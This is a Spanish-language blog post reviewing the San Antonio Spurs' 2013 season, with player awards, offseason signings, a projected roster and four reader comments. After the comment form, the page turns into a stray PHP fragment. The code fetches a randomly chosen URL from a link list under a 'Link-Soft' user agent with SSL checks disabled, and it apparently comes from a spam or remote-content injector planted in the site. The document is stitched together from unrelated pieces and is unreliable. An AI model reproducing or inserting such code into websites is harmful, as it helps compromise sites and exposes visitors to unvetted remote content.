San Antonio Spurs: Excelente

01 de August de 2013 por TheDeerHunter

Es curioso cómo nos moldeamos conforme cambian nuestros gustos y preferencias. Más aún, la forma como se cocina el cambio. Pequeñas y silenciosas revoluciones dentro de nuestra mente que marcarán para siempre nuestras vidas. Un día nos acostamos ignorando la niña que se sienta a nuestro lado en el colegio para volvernos perdidamente locos por ella al día siguiente, o aquel momento en el que dejamos de tener bronca diaria con nuestra madre por no comernos el pescado o las lentejas, cuando nos sorprendimos deseando que Darth Vader deforestara la luna de Endor exterminando a cada uno de los puñeteros Ewoks, o el fatídico momento en el que pasó de sabernos la cerveza a orín a consumirla a barriles… Pero lo más terrible, cuando hemos empezado a paladear el preciosista juego de pase de Greg “ganar-de-cualquier-manera” Popovich.

¿Cómo hemos llegado a esto? ¿Se trata únicamente de otra mutación del LeBron-hater? ¿Pasamos de ser “de los Mavs de toda la vida” a fans acérrimos del “yo-me-lo-guiso” de Durant y Westbrook, hasta terminar, en lo máximo del chaqueterismo, abrazando al anticristo baloncestístico de alguna generación? Bruce Lee Bowen se descojonaría de nuestro cinismo allá donde se encuentre y nos escupiría a la cara si pudiera (eso seguro).

 Exageramos, por supuesto. Hasta tan lejos no puede llegar la sombra de King James. Hay que darle al César lo que es del César y por mucho que algunos odiáramos en su día todo lo que apestara a espuela tejana no podemos negar los méritos actuales. No hay que ser un genio del “encuentra a Wally” para observar las diferencias de juego entre varias versiones de los Spurs campeones y los de ahora. Mientras aquellos se cimentaban en la defensa más sólida de la liga (estirando todo lo posible el reglamento) estos se fundamentan en unos sistemas ofensivos brillantes y en el más precioso, a la par que efectivo, juego de pases de toda la liga.

Gracias a la actual filosofía los Spurs llevan un ciclo de tres temporadas dominando de forma inesperada la regular, con un balance por encima del 73% de victorias (169 victorias por 61 derrotas) sobre un proyecto que se daba por agotado en el verano del 2009. Es más que comprensible que ante estos argumentos algunos consideráramos de justicia casi divina el mayor de los éxitos a los supervivientes del equipo campeón de hace ahora justo una década. Como dijimos en la previa de la final, si LeBron quiere codearse con los que se le presupone tiene que doblegar a este tipo de rivales.

El sueño de la guinda como un 5º título a una de las grandes dinastías de la historia no pudo ser por apenas un suspiro. Lo acariciaron como no lo hizo ningún derrotado antes. Tras una postemporada fabulosa sólo puede quedar uno, pero mientras recordemos los detalles habrá honor de campeones para ellos en nuestros corazones.

PREMIOS

MVP: Nos ha convencido. Tim Duncan es sin duda uno de los 10 mejores jugadores de la historia, superando a auténticos monstruos de este deporte. De no haber entrado el triple de Allen estaríamos hablando de otro MVP de las finales a un hombre de 37 años. Como Jabbar.

Sorpresa: Danny Green estuvo tocado por los dioses durante buena parte de la postemporada. De no haberse hundido en el peor momento sería para él el premio. No es sorpresa que Kawhi Leonard despliegue un sólido nivel de juego pero lo suyo en las finales ha sido doctorarse. Se trata de un jugador que devora plazos en su desarrollo. Aún no se le adivina techo.

Decepción: Lo pasó muy mal Manudo e incluso fue clave negativa en alguna de las derrotas. Su pundonor le permitió salvar la cara en el último tramo de la serie, donde otros no eran capaces más que de esconderse. La verdadera clave de la final, aunque hablemos de distinto estatus de jugador, fue el flojo rendimiento de Tiago Splitter. Atreverse con un small-ball contra Miami es jugar a los dados con la muerte y el brasileño no dio a Popovic muchas opciones.

Esfuerzo en vano: Un recuerdo a la carrera de Tracy McGrady. Llegar hasta aquí, lograr superar alguna ronda de playoffs y acariciar el título, pero sin anotar un solo punto en toda la postemporada. Barriendo como lo hicieron en alguna que otra serie, Popovich se podría haber estirado un poco.

JUGANDO A GM

Poco que decir a estas alturas. Hay quien pedía reconstrucción. Parecería una fantástica idea de no ser porque lo lleva pareciendo desde hace un lustro y cada año nos la vuelven a pegar estos “chavales”.

– Mantenimiento del proyecto: La lógica dice que es imposible mejorar lo de este año y que el declive va a ser prácticamente inmediato. Aunque así fuera, mientras Duncan permanezca en activo hay que darle opciones. A ser posible incluyendo a Manudo (y Parker) a su lado. La renovación de Manudo por dos años era moralmente obligatoria.

– Renovación de Splitter: Cara y, a tenor del rendimiento reciente, muy discutible. Sin embargo tampoco creo que hubiera opciones en el mercado mucho más interesantes para ellos. Tampoco podemos olvidar que su regular fue notable.

– No renovación de DeJuan Blair: Cantada, pero trágica para la franquicia. Un excelente activo que se pierde por el camino. No se entiende su caso. Por cierto, se hablaba de Oden y tampoco terminaría de entenderlo.

– Fichaje de Bellinelli: Estupendo. Un jugador de su perfil, por ese precio es una ganga. Si conecta con Popovich puede ponerse las botas.

– Fichaje de Pendergraph: Total incógnita.

Así, a falta de probablemente algún alero suplente y los tradicionales fichajes de veteranos a mitad de curso estos serán los llamados a librarse la revancha contra Miami:

PG: Parker, De Colo, Cory Joseph, Patty Mills
SG: Danny Green, Ginobili, Bellinelli
SF: Leonard
PF: Duncan, Bonner, Pendergraph
C: Splitter, Diaw, Aaron Baynes

Comenta

4 comentarios a esta entrada

  1. dunc dice:
    #1

    Una gran crónica, gracias.

    Sin embargo, yo le habría dado algún premio a Pop, casi impecable año tras año, manteniendo la motivación de los veteranos, convirtiendo en jugadores importantes a deshauciados de la liga e integrando a la gente joven en la rotación.

    Chapeau, viejo zorro.

      Citar

  2. Sancho88 dice:
    #2

    Suplente de Leonard el señor DeShaun Thomas, encaja totalmente en el esquema de trabajo de Popovich, no hay problemas en ese sentido.

    Luego el resumen muy de puta madre, con un estilo guapo (me he descojonado con lo de Bruce Lee Bowen), jejej, pero creo que se es un poco injusto en general con Manu. Hay que recordar que de no ser por un triple salvador suyo, los Warriors se habrían llevado un 2-0 del Álamo en semifinales del oeste, con todo por jugar en Oakland… a saber qué hubiera pasado. Cierto es que sus finales, sobre todo, son decepcionantes. Solo apareció en el quinto, si mal no recuerdo, y cuando lo hizo los Spurs ganaron. Es una fórmula casi matemática. Qué lástima que solo apareciese ese día.

    Las finales mucha gente dicen que han sido las mejores de la historia, aunque los cuatro primeros partidos (excepto el primero) no tenían emoción en los últimos cuartos. Yo creo que coincido, han sido emocionantes y de calidad. Hay que rendirse a la magia de estos tíos. Duncan es eterno y Parker sano el mejor base del mundo. Chapó por los Spurs

      Citar

  3. rumbero dice:
    #3

    Una maravilla de resumen. Que cerquita lo tuvieron y que pena da ahora con un poco más de perspectiva…hubiera sido la reostia.
    Me han entrado ganas de ponerme el sexto y a llorar un rato, hasta luego

      Citar

  4. r_miller dice:
    #4

    Lo que hacen los Spurs se llama BALONCESTO y de este BALONCESTO deberian aprender 28 equipos de la NBA a exepcion de los Heat solo porque tienen a unos monstruos como Lebron y Wade.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>